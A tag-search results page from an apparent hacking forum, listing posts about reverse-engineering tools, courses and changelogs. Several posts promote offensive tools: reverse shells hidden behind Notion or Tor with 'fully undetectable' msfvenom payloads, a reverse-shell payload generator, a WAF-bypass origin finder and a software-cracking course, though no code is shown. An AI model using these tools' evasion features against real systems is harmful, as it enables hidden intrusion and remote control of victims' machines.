Jump to content

Search the Community

Showing results for tags 'reverse'.

The search index is currently processing. Current results may not be complete.
  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
    • Moderators
    • Staff
    • Administration
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
    • Windows Phone
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Location


Interests


Occupation


TeamViewer


Twitter


Facebook


Youtube


Google+


Tox

  1. This framework helps with Flutter apps reverse engineering using the patched version of the Flutter library which is already compiled and ready for app repacking. This library has a snapshot deserialization process modified to allow you to perform dynamic analysis in a convenient way. Key features: socket.cc is patched for traffic monitoring and interception; dart.cc is modified to print classes, functions, and some fields; display absolute code offset for functions contains minor changes for successful compilation; if you would like to implement your own patches, there is a manual Flutter code change is supported using a specially craftedDockerfile Supported engines Android: arm64, arm32; iOS: arm64; Release: Stable, Beta [hide][Hidden Content]]
  2. Riptide is a tool allowing you to reverse .EXE files compiled with PyInstaller back to the original source, Python, showing you the source code of the file. [hide][Hidden Content]]
  3. Description If you are completely new to Cutter and want to get up and running fast then this course is for you. In this course, we will cover how to use Cutter for Windows and Linux. Cutter is an an advanced, GUI-based, free and open-source reverse-engineering platform designed to take the pain out of radare2. It’s backend is running Rizin, a fork of the radare2 engine. Cutter is created by reverse engineers for reverse engineers. Cutter releases are fully integrated with native Ghidra decompiler. Not only can Cutter disassemble a binary file, but it can also decompile it to C language. It also has a linear disassembly view, fully featured graph view as well as mini-graph for fast navigation. Cutter also features the ability to reverse debug which other debugger lacks. This feature allows you to not only step forwards, but you can also step backwards! Cutter also has hexdumps and stack view which allows you to trace stack, register and inspect memory on the fly. In addition to that, you can also patch the binary, by reversing jumps, modifying instructions and bytes. This course will teach you all of the above and more. Designed with beginners in mind. Simple windows and Linux Crackme’s designed to learn reverse engineering legally Practical and hands-on Using free tools only Suitable for: Reverse Engineering and Malware Analysis Students Anyone interested to learn to use Cutter for Reverse Engineering Security researchers Prerequisite: Windows PC Basic Assembly and C/C++ language would be helpful but not mandatory Familiarity with basic Linux commands would be useful but not mandatory Everything you need to know is covered in the course Enroll now and I will see you inside! Who this course is for: Anyone interested to learn to use Cutter for Reverse Engineering Reverse engineering and malware analysis students Security researchers Requirements Basic Assembly Language , C Programming Windows PC Basic Linux commands [Hidden Content] [hide][Hidden Content]]
  4. Cutter is a Qt and C++ GUI for radare2. Its goal is making an advanced, customizable and FOSS reverse-engineering platform while keeping the user experience at mind. Cutter is created by reverse engineers for reverse engineers. Disclaimer Cutter is not aimed at existing radare2 users. It instead focuses on those whose are not yet radare2 users because of the learning curve, because they don’t like CLI applications or because of the difficulty/instability of radare2. Changelog v2.1 Additions Adds signatures widget for managing FLIRT signatures Supports and bundles SigDB, a library of FLIRT signatures for commonly found libraries Bundles the new Yara plugin to apply and create yara rules Bundles Apple Swift demangler Adds option to fill missing bytes with nops when editing an instruction Adds hexeditor option to write hex bytes Adds option to add comments directly from hexdump widget Uses RzAnnotatedCode with JSDec for colored output with semantic information Adds double click to seek to global variable in decompiler widget Adds report issue button in “About” Many internal rizin commands has been translated to their C equivalent Enables console redirection on Windows Bugfixes Adds missing Rizin headers in Python bindings Fixes gdbserver segfault [hide][Hidden Content]]
  5. Reverse Engineers’ Hex Editor A cross-platform (Windows, Linux, Mac) hex editor for reverse engineering, and everything else. Features Large (1TB+) file support Decoding of integer/floating-point value types Inline disassembly of machine code Highlighting and annotation of ranges of bytes Side by side comparison of selections Lua scripting support (API reference here) Virtual address mapping support Changelog v0.5.3 Correctly nest comments when updating comments panel (#169). Update text in comments panel when a comment is modified. Fix display of >4GiB virtual offsets in files that are <=4GiB (#170). Add support for code page 437 (IBM) and 932/936/949/950 (Microsoft). Fix handling of multibyte character boundaries in document view. Draw wide characters in document view (#173). Move forwards/backwards and select whole instructions from disassembly in document view. Don’t capture tab key press in text area of document view. Add missing error checks. Add number base option to “Jump to offset” dialog. Drawing optimisations (improves responsiveness), particularly on macOS. Fix some undefined behaviour issues. [hide][Hidden Content]]
  6. A Hex Editor for Reverse Engineers, Programmers, and people that value their eyesight when working at 3 AM. Features Featureful hex view Byte patching Patch management Copy bytes as feature Bytes Hex string C, C++, C#, Rust, Python, Java & JavaScript array ASCII-Art hex view HTML self-contained div String and hex search Colorful highlighting Goto from start, end, and current cursor position Custom C++-like pattern language for parsing highlighting a file’s content Automatic loading based on MIME-type arrays, pointers, structs, unions, enums, bitfields, using declarations, litte and big-endian support Useful error messages, syntax highlighting, and error marking Data importing Base64 files IPS and IPS32 patches Data exporting IPS and IPS32 patches Data Exporting Data inspector allowing interpretation of data as many different types (little and big-endian) Huge file support with fast and efficient loading Strings search Copying of strings Copying of detangled strings File hashing support CRC16 and CRC32 with custom initial values and polynomials MD4, MD5 SHA-1, SHA-224, SHA-256, SHA-384, SHA-512 Disassembler supporting many different architectures ARM32 (ARM, Thumb, Cortex-M, aarch32) ARM64 MIPS (MIPS32, MIPS64, MIPS32R6, Micro) x86 (16 bit, 32 bit, 64 bit) PowerPC (32 bit, 64 bit) Sparc SystemZ XCore M68K TMS320C64X M680X Ethereum Bookmarks Region highlighting Comments Data Analyzer File magic-based file parser and MIME type database Byte distribution graph Entropy graph Highest and avarage entropy Encrypted / Compressed file detection Helpful tools Itanium and MSVC demangler ASCII table Regex replacer Mathematical expression evaluator (Calculator) Hexadecimal Color picker Built-in cheat sheet for pattern language and Math evaluator Doesn’t burn out your retinas when used in late-night sessions Changelog v1.18.2 Additions Added Brazilian Portuguese translation. Huge thanks to @dgsmiley18 Added IEEE 754 floating-point number experimenting tool Completely rewrote the Hash view It now supports displaying multiple different Hash types at the same time Configured hashes now also appear in the hex editor when selecting a region, hovering the cursor over it and holding down SHIFT Added tooltip to all Visualizer data processor nodes that display the visualization a lot bigger Improvements Improved contrast of the pattern language error popup text color in light mode Bug Fixes Fixed editing values in the hex editor Fixed another scroll issue in the hex editor Fixed pasting bytes in the hex editor view Fixed bookmarks automatically collapsing when editing their name Fixed a crash when the OS didn’t configure monitors correctly This mainly happens when using Windows Remote Desktop [hide][Hidden Content]]
  7. FOR : Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell) Demo/Quick proof insertion within report High available and shareable reverse shell (desktop, browser, mobile) Encrypted and authenticated remote shell NOT FOR : Long and interactive shell session (see tacos for that) [hide][Hidden Content]]
  8. Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies. How does it work? This tool will first make an HTTP request to the hostname that you provide and store the response, then it will make a request to every IP address that you provide via HTTP (80) and HTTPS (443), with the Host header set to the original host. Each HTTP response is then compared to the original using the Levenshtein algorithm to determine similarity. If the response is similar, it will be deemed a match. [hide][Hidden Content]]
  9. What is tornado? Tornado is implements tor network with metasploit-framework tool and msfvenom module, you can easily create hidden services for your localhost .onion domain without portforwarding. If you have experience different remote administration tools, probably you know you need forward port with virtual private network or ngrok but in this sense with tornado, the tor network offers the possibility of making services in a machine accessible as hidden services without portforwarding, by taking advantage of the anonymity it offers and thereby preventing the real location of the machine from being exposed. tornado can do create hidden service with tor network generate cross platform msfvenom payload with fully undetectable shellcode execution not shikata_ga_nai things hidden service becomes available outside tor network and ready to reverse shell connection be careful with tor2web even onion network, the only suicide mission is wearing blinders. tornado not secure from victim's point of view: the point of tor is that users can connect without being eavesdropped on and going through the clearnet with tor2web, even with https seriously cripples the efforts made to protect users. Disclaimer This tool is only for testing and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and are not responsible for any misuse or damage caused by this tool and software. [hide][Hidden Content]]
  10. HookCase is a tool for debugging and reverse engineering applications on macOS (aka OS X), and the operating system itself. It re-implements and extends Apple’s DYLD_INSERT_LIBRARIES functionality. It can be used to hook any method in any module (even non-exported ones, and even those that don’t have an entry in their own module’s symbol table). In a single operation, it can be applied to a parent process and all its child processes, whether or not the child processes inherit their parent’s environment. So HookCase is considerably more powerful than DYLD_INSERT_LIBRARIES. It also doesn’t have the restrictions Apple has placed on DYLD_INSERT_LIBRARIES. So, for example, HookCase can be used with applications that have entitlements. HookCase supports interpose hooks. But it also supports another, more powerful kind of hook that we call “patch hooks”. These can hook calls to a method named in its module’s symbol table, including ones that come from the same module. They can also hook calls to an unnamed method (one that isn’t in its module’s symbol table), by specifying the method’s address in its module. So they can be used with non-exported (aka private) methods (named and unnamed) — ones not intended for use by external modules. Patch hooks are so-called because we set them up by “patching” the beginning of an original method with a software interrupt instruction (int 0x30). HookCase’s kernel extension handles the interrupt to implement the hook. This is analogous to what a debugger does when it sets a breakpoint (though it uses int 3 instead of int 0x30). Software interrupts are mostly not used on BSD-style operating systems like macOS and OS X, so we have plenty to choose among. For now, we’re using those in the range 0x30-0x34. Whatever their disadvantages, interpose hooks are very performant. They’re implemented by changing a pointer, so they impose no performance penalty whatsoever (aside from the cost of whatever additional code runs inside the hook). Patch hooks can be substantially less performant — if we have to unset the breakpoint on every call to the hook, then reset it afterward (and protect these operations from race conditions). But this isn’t needed for methods that start with a standard C/C++ prologue in machine code (which is most of them). So most patch hooks run with only a very small performance penalty (that of a single software interrupt). HookCase is compatible with DYLD_INSERT_LIBRARIES and doesn’t stomp on any of the changes it may have been used to make. So a DYLD_INSERT_LIBRARIES hook will always override the “same” HookCase interpose hook. This is because Apple often uses DYLD_INSERT_LIBRARIES internally, in ways it doesn’t document. HookCase would likely break Apple functionality if it could override Apple’s hooks. But this doesn’t apply to patch hooks. Since Apple doesn’t use them, we don’t need to worry about overriding any that Apple may have set. If an interpose hook doesn’t seem to work, try a patch hook instead. (Unless you write them to do so, neither interpose hooks nor patch hooks inherently change the behavior of the methods they hook.) HookCase is compatible with lldb and gdb: Any process with HookCase’s interpose or patch hooks can run inside these debuggers. But you may encounter trouble if you set a breakpoint and a patch hook on the same method, or try to step through code that contains a patch hook. HookCase runs on OS X 10.9 (Mavericks) through macOS 10.15 (Catalina). Changelog v6.0.3 macOS 12.4 once again broke HookCase, by making changes that normally only happen in major releases. This time none of the breakage was caused by changes to internal kernel structures (though some of those used by HookCase did change). Instead it was caused by two changes in behavior. HookCase 6.0.3 works around them. For more information see Issue #34. [hide][Hidden Content]]
  11. Anonymously Reverse shell over Tor Network using Hidden Services without port forwarding. This project implements the tor network with the metasploit-framework tool and msfvenom module. You can easily create hidden services for your LHOST .onion domain without portforwarding. If you have experienced different remote administration tools, probably you know you need a forward port with VPN or NGROK but in this sense, the Tor network offers the possibility of making services in a machine accessible as hidden services without portforwarding, by taking advantage of the anonymity it offers and thereby preventing the real location of the machine from being exposed. Currently, this project has that features. Create a hidden service Generate msfvenom payload with fully undetectable Hidden service becomes available outside tor network Disclaimer This tool is only for testing and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and are not responsible for any misuse or damage caused by this tool and software. [hide][Hidden Content]]
  12. This is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you’ll have a folder on your desktop with shortcuts to RE tools like these: Why do I need it? You don’t. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you’ll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you’re setting up a new analysis VM. Included tools Tools by category .NET Compilers Debuggers Decompilers Document analysis Hexadecimal editors PE analyzers PE resources editors Process monitors Signature tools Unpacking Utilities Changelog v2022.04 Changes: Added: Echo Mirage. elfparser-ng. entropy (closes #47). Force Toolkit. MiniDump x64dbg plugin. Notepad++. OllyDumpEx x64dbg plugin (closes #41). Removed: Bewareircd: Too specific to analyze (now rare?) IRC-based communications. dnSpy: Replaced by dnSpyEx. HyperDBG: It’s a nice project, but they don’t provide binary releases yet, meaning a lot of work for me. JRE: Replaced by JDK, which is required by Ghidra. Threadtear: It doesn’t work with JDK required by Ghidra. [hide][Hidden Content]]
  13. efiXplorer – IDA plugin for UEFI firmware analysis and reverse engineering automation Supported versions of Hex-Rays products: every time we focus on the last versions of IDA and Decompiler because trying to use the most recent features from new SDK releases. That means we tested only on recent versions of Hex-Rays products and do not guarantee stable work on previous generations. Why not IDApython: all code developed in C++ because it’s a more stable and performant way to support a complex plugin and get the full power of the most recent SDK’s features. Supported Platforms: Win, Linux, and OSX (x86/x64). Changelog v4.1 [new feature] Improved SMI handlers recognition to support: SxSmiHandler, IoTrapSmiHandler, UsbSmiHandler and etc. [new feature] Improved child SW SMI handlers recognition and now annotated as ChildSwSmiHandler. [new feature] Added visual representation for NVRAM variables and additional context in JSON report: address, service name, var name and var GUID. [bug fix] Numerous improvements and bug fixes in code analyzer and firmware image loader Moving to support of IDA SDK v7.7 [hide][Hidden Content]]
  14. View File Learn how to Reverse Engineer Apps & Softwares via this detailed Course Learn how to Reverse Engineer Apps & Softwares via this detailed Course * Learn How To Crack Software Legally And More.. Download Link: Free for users PRIV8 Submitter dEEpEst Submitted 28/04/22 Category Libro Online Password ********  
  15. 4 downloads

    Learn how to Reverse Engineer Apps & Softwares via this detailed Course * Learn How To Crack Software Legally And More.. Download Link: Free for users PRIV8
    $110 PRIV8
  16. A cross-platform (Windows, Linux, Mac) hex editor for reverse engineering, and everything else. Features Large (1TB+) file support Decoding of integer/floating-point value types Inline disassembly of machine code Highlighting and annotation of ranges of bytes Side by side comparison of selections Lua scripting support (API reference here) Virtual address mapping support Changelog v0.5 Added “x86 disassembly syntax” to “View” menu to allow selecting between Intel or AT&T notation for x86 disassembly (#142). Handle file open message used for “Open With” on macOS (#144). Added –compare switch to jump straight into comparing two files (#141). Fix timer leak that can cause a crash when closing the compare window or strings panel. Add import and export functions for Intel Hex files (#102). Add online help (#147). Add Bitmap Data Visualisation tool (#29). Add Binary Template support (#138). [Emily Ellis] Save new files without the execute bit set (#154). Include highlight colour names in context menu (#153). Save write protect setting in rehex-meta.json (#143). Fix several occasional crashes. [hide][Hidden Content]]
  17. A Hex Editor for Reverse Engineers, Programmers, and people that value their eyesight when working at 3 AM. Features Featureful hex view Byte patching Patch management Copy bytes as feature Bytes Hex string C, C++, C#, Rust, Python, Java & JavaScript array ASCII-Art hex view HTML self-contained div String and hex search Colorful highlighting Goto from start, end, and current cursor position Custom C++-like pattern language for parsing highlighting a file’s content Automatic loading based on MIME-type arrays, pointers, structs, unions, enums, bitfields, using declarations, litte and big-endian support Useful error messages, syntax highlighting, and error marking Data importing Base64 files IPS and IPS32 patches Data exporting IPS and IPS32 patches Data Exporting Data inspector allowing interpretation of data as many different types (little and big-endian) Huge file support with fast and efficient loading Strings search Copying of strings Copying of detangled strings File hashing support CRC16 and CRC32 with custom initial values and polynomials MD4, MD5 SHA-1, SHA-224, SHA-256, SHA-384, SHA-512 Disassembler supporting many different architectures ARM32 (ARM, Thumb, Cortex-M, aarch32) ARM64 MIPS (MIPS32, MIPS64, MIPS32R6, Micro) x86 (16 bit, 32 bit, 64 bit) PowerPC (32 bit, 64 bit) Sparc SystemZ XCore M68K TMS320C64X M680X Ethereum Bookmarks Region highlighting Comments Data Analyzer File magic-based file parser and MIME type database Byte distribution graph Entropy graph Highest and avarage entropy Encrypted / Compressed file detection Helpful tools Itanium and MSVC demangler ASCII table Regex replacer Mathematical expression evaluator (Calculator) Hexadecimal Color picker Built-in cheat sheet for pattern language and Math evaluator Doesn’t burn out your retinas when used in late-night sessions Changelog v1.17 Additions Added support for the new Yara console module Pattern Language The Pattern Language has been separated from ImHex and was moved to its own repository This was in part made possible by @Diadlo‘s separation of the pattern rendering code from the rest of the runtime A separate repository also now allows other people to include the Pattern Language in their own applications Types can now be forward declared Functions can now have default parameters Bitfield fields are now selectable Comments behind preprocessor defines are now correctly handled Fixed recursive types not working correctly Fixed caching for static array values Fixed indentation for inlined variables Fixed highlight colors of arrays not matching color shown in pattern data view Fixed struct members that overlap with [[no_unique_address]] members not being highlighted Fixed pointer patterns causing crashes when they are rendered Improvements Make ImHex build with -Wall -Wextra -Werror on all platforms Fixed tons of clang-tidy warnings Improved / fixed the AppImage build Recently opened file entries are now being removed if the file doesn’t exist anymore Disabled various menu items when no provider is loaded Multi-viewport support has been enabled on Linux again, providing ImHex is running on a X11 system Multi-viewport support is still very buggy on Wayland Improved the about page Pattern values are now being cached. Thanks to @Diadlo Mathematical expressions can now be used in the hex editor goto function Improved look and feel of many hexadecimal input fields Improved string search filtering Moved bookmark delete button to their header Information view plots now don’t capture scroll anymore and fit better into the rest of the interface Undo and Redo buttons are only available now if that action is actually available Data inspector endian and format radio boxes are now sliders Bug Fixes Fixed crash when setting a custom font and that file can’t be found Fixed various bugs and crashes related to filesystem operations Fixed various bugs with the Math Evaluator engine Fixed highlighting not properly being cleared when switching to a different provider Prevent imgui.ini from being created Deferred calls are now handled in a thread-safe manner Fixed interface layout not being saved properly in some cases Fixed theme not changing properly on startup. Thanks to @PredatorCZ Fixed issues where bookmarks not always created highlights correctly Fixed displaying of file stat times in information view Fixed crash on linux when opened file is being modified. Thanks to @PredatorCZ [hide][Hidden Content]]
  18. Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more. There is also a plugin system that will allow you to interact with the loaded classfiles, for example, you can write a String deobfuscator, a malicious code searcher, or something else you can think of. You can either use one of the pre-written plugins or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM. Code from various projects has been used, including but not limited to: J-RET by WaterWolf JHexPane by Sam Koivu RSynaxPane by Robert Futrell Commons IO by Apache ASM by OW2 FernFlower by Stiver Procyon by Mstrobel CFR by Lee Benfield CFIDE by Bibl Smali by JesusFreke Dex2Jar by pxb1..? Krakatau by Storyyeller JD GUI/JD Core by The Java-Decompiler Team Enjarify by Storyyeller Key Features: Krakatau Integration for Bytecode assembly/disassembly. Smali/BakSmali Integration – You can now edit class files/dex files via smali! APK/DEX Support – Using Dex2Jar and Jar2Dex it’s able to load and save APKs with ease! Java Decompiler – It utilizes FernFlower, Procyon, and CFR for decompilation. Bytecode Decompiler – A modified version of CFIDE’s. Hex Viewer – Powered by JHexPane. Each Decompiler/Editor/Viewer is toggleable, you can also select what will display on each pane. Fully Featured Search System – Search through strings, functions, variables and more! A Plugin System With Built-In Plugins – (Show All Strings, Malicious Code Scanner, String Decrypters, etc) Fully Featured Scripting System That Supports Groovy. EZ-Inject – Graphically insert hooks and debugging code, invoke main and start the program. Recent Files & Recent Plugins. And more! Give it a try for yourself! Changelog v2.11.2 Notable Changes Java 18/19 support – @ThexXTURBOXx Security Manager has been adjusted to work on Java 18+ – @ThexXTURBOXx ASM update for Java 19 support – @ThexXTURBOXx Added Croatian, Czech, Bulgarian, Danish and Serbian translations – @Konloch Fixed running precompiled plugins – @Lucaskyy CFR interface improvements – @GraxCode / @ThexXTURBOXx Procyon update – @ThexXTURBOXx FernFlower update – @ThexXTURBOXx Jadx update – @ThexXTURBOXx Dependency updates and fixes- @ThexXTURBOXx Bytecode Disassembler improvements & additions – @GraxCode General bug fixes and improvements – @Konloch / @ThexXTURBOXx / @GraxCode And more! Thank you to everyone who has contributed to this patch. @ThexXTURBOXx / @Konloch / @GraxCode / @Lucaskyy [hide][Hidden Content]]
  19. Aka my wip gui for android reverse engineers and crackers. Built on top of pyqt5 (compatible with all os’s), Frida and some terrible code. Features Quick spawn, inject and sleep at application onCreate Hook natives, java and loading modules cycle before initializations Hooks conditions and js script logic Manipulate memory and arguments Memory and disasm view (Powered by capstone) Switch between hooks on different threads Inputs are evaluated. Frida js api and dwarf shortcuts are usable in almost any input field Variables creation Save and load back hooks and variables [Hidden Content]
  20. Description *Get the Official Certificate after Completing the Course Learn Malware Analysis and Reverse Engineering Deeply with CRMA+ 2022 Course. Breaking something down and putting it back together is a process that helps people understand how things were made. A person would be able to redo and reproduce an origami by unfolding it first. Knowing how cars work requires understanding each major and minor mechanical part and their purposes. The complex nature of the human anatomy requires people to understand each and every part of the body. How? By dissecting it. Reverse engineering is a way for us to understand how things were designed, why is it in its state, when it triggers, how it works, and what its purpose is. In effect, the information is used to redesign and improve for better performance and cost. It can even help fix defects. It is amazing, and rather disconcerting, to realize how much software we run without knowing for sure what it does. We buy software off the shelf in shrink wrapped packages. We run setup utilities that install numerous files, change system settings, delete or disable older versions and superseded utilities, and modify critical registry files. Every time we access a Website, we may invoke or interact with dozens of programs and code segments that are necessary to give us the intended look, feel, and behaviour. We purchase CDs with hundreds of games and utilities or download them as shareware. We exchange useful programs with colleagues and friends when we have tried only a fraction of each program’s features. Then, we download updates and install patches, trusting that the vendors are sure that the changes are correct and complete. We blindly hope that the latest change to each program keeps it compatible with all of the rest of the programs on our system. We rely on much software that we do not understand and do not know very well at all. I refer to a lot more than our desktop or laptop personal computers. The concept of ubiquitous computing, or “software everywhere,” is rapidly putting software control and interconnection in devices throughout our environment. The average automobile now has more lines of software code in its engine controls than were required to land the Apollo astronauts on the Moon. Malware analysis is the study of malware’s behaviour. The objective of malware analysis is to understand the working of malware and how to detect and eliminate it. It involves analysing the suspect binary in a safe environment to identify its characteristics and functionalities so that better defences can be built to protect an organization’s network. Imagine if the Trojan Horse was thoroughly inspected and torn down before it was allowed to enter the gates of a city. This would probably cause a few dead soldiers outside the gate fighting for the city. The next time the city is sent another Trojan Horse, archers would know where to point their arrows. And no dead soldiers this time. The same is true for malware analysis—by knowing the behaviours of a certain malware through reverse engineering, the analyst can recommend various safeguards for the network. Think of it as the Trojan Horse being the malware, the analyst being the soldier who initially inspected the horse, and the city being the network of computers. Who this course is for: Beginner Reverse Engineers who curious about learning Reverse Engineering Beginner Malware Analyst who curious about learning Malware Analysis Requirements Basic Computer Understanding [Hidden Content] [Hidden Content]
  21. LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly. The reverse shell payloads that LAZYPARIAH supports include (but are not limited to): C binary payloads (compiled on the fly): c_binary Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c Powershell payloads: powershell_c, powershell_b64 Base64-encoded Python payloads: python_b64 Rust binary payloads (compiled on the fly): rust_binary PHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64 Java classes (compiled on the fly): java_class Perl payloads: perl, perl_b64, perl_hex, perl_c Simple PHP payloads (targeting specific file descriptors): php_fd, php_fd_c, php_fd_tags Dependencies Ruby >= 2.7.1 (LAZYPARIAH has not been tested on previous versions of Ruby) OpenJDK (Optional: Only required for java_class payloads.) GCC (Optional: Only required for c_binary payloads.) Rust (Optional: Only required for rust_binary payloads.) [hide][Hidden Content]]
  22. A Hex Editor for Reverse Engineers, Programmers, and people that value their eyesight when working at 3 AM. Features Featureful hex view Byte patching Patch management Copy bytes as feature Bytes Hex string C, C++, C#, Rust, Python, Java & JavaScript array ASCII-Art hex view HTML self-contained div String and hex search Colorful highlighting Goto from start, end, and current cursor position Custom C++-like pattern language for parsing highlighting a file’s content Automatic loading based on MIME-type arrays, pointers, structs, unions, enums, bitfields, using declarations, litte and big-endian support Useful error messages, syntax highlighting, and error marking Data importing Base64 files IPS and IPS32 patches Data exporting IPS and IPS32 patches Data Exporting Data inspector allowing interpretation of data as many different types (little and big-endian) Huge file support with fast and efficient loading Strings search Copying of strings Copying of detangled strings File hashing support CRC16 and CRC32 with custom initial values and polynomials MD4, MD5 SHA-1, SHA-224, SHA-256, SHA-384, SHA-512 Disassembler supporting many different architectures ARM32 (ARM, Thumb, Cortex-M, aarch32) ARM64 MIPS (MIPS32, MIPS64, MIPS32R6, Micro) x86 (16 bit, 32 bit, 64 bit) PowerPC (32 bit, 64 bit) Sparc SystemZ XCore M68K TMS320C64X M680X Ethereum Bookmarks Region highlighting Comments Data Analyzer File magic-based file parser and MIME type database Byte distribution graph Entropy graph Highest and avarage entropy Encrypted / Compressed file detection Helpful tools Itanium and MSVC demangler ASCII table Regex replacer Mathematical expression evaluator (Calculator) Hexadecimal Color picker Built-in cheat sheet for pattern language and Math evaluator Doesn’t burn out your retinas when used in late-night sessions Changelog v1.16.2 Improvements Yara rules are no longer bundled with ImHex directly anymore. Having them bundled made a bunch of different anti virus tools very sad so they once again need to be downloaded manually from the content store Patterns that use types which have been defined through a using statement now properly display their new type name in the pattern data view Bug Fixes Fixed searching not working at all Fixed many text boxes not being writable at all Pattern Language Fixed crash when using control flow statements without a value Fixed control flow statements not working correctly inside of custom types Fixed crash when using attributes Fixed major memory leak when using the [[format]] attribute Fixed crash when passing a value as a auto parameter to a function [hide][Hidden Content]]
  23. Description As android security is trending nowadays, it’s very necessary to learn about reverse engineering Android applications. This short course will give you a firm foundation to start your journey in android reverse engineering. Firstly, we will be covering some of the most used tools in android reverse engineering. Then we will move on to topics like decompiling, understanding smali and patching applications, etc. You will learn to extract the decompiled source code and understand the working of the application. Unlike other courses, we won’t be wasting half of our time setting up labs. we will be diving straight into our topics. Similarly, I won’t be wasting your time by explaining unwanted kinds of stuff and theory which don’t do any help This is a highly practical course so we will understand mostly everything reversing our custom-made crackme applications rather than just looking at theory and slides. Unlike earlier days, many applications are built using react native and flutter. So we will Reverse flutter and react native applications too. We will be also reversing .so objects using tools like Ghidra. After learning completing this course I’m sure that you develop the foundation to reverse, understand and patch basic android applications. You will be able to do basic android reverse engineering challenges. NOTE: This is an ongoing course remaining contents will be added weekly Who this course is for: CTF Players Bug Hunters Security Enthusiasts Anyone who’s interested in Android Reverse Engineering Requirements Some programming background is assumed Windows PC [Hidden Content] [hide][Hidden Content]]
  24. Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more. It’s written completely in Java, and it’s open source. It’s currently being maintained and developed by Konloch. There is also a plugin system that will allow you to interact with the loaded classfiles, for example, you can write a String deobfuscator, a malicious code searcher, or something else you can think of. You can either use one of the pre-written plugins or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM. Code from various projects has been used, including but not limited to: J-RET by WaterWolf JHexPane by Sam Koivu RSynaxPane by Robert Futrell Commons IO by Apache ASM by OW2 FernFlower by Stiver Procyon by Mstrobel CFR by Lee Benfield CFIDE by Bibl Smali by JesusFreke Dex2Jar by pxb1..? Krakatau by Storyyeller JD GUI/JD Core by The Java-Decompiler Team Enjarify by Storyyeller Key Features: Krakatau Integration for Bytecode assembly/disassembly. Smali/BakSmali Integration – You can now edit class files/dex files via smali! APK/DEX Support – Using Dex2Jar and Jar2Dex it’s able to load and save APKs with ease! Java Decompiler – It utilizes FernFlower, Procyon, and CFR for decompilation. Bytecode Decompiler – A modified version of CFIDE’s. Hex Viewer – Powered by JHexPane. Each Decompiler/Editor/Viewer is toggleable, you can also select what will display on each pane. Fully Featured Search System – Search through strings, functions, variables and more! A Plugin System With Built-In Plugins – (Show All Strings, Malicious Code Scanner, String Decrypters, etc) Fully Featured Scripting System That Supports Groovy. EZ-Inject – Graphically insert hooks and debugging code, invoke main and start the program. Recent Files & Recent Plugins. And more! Give it a try for yourself! [hide][Hidden Content]]
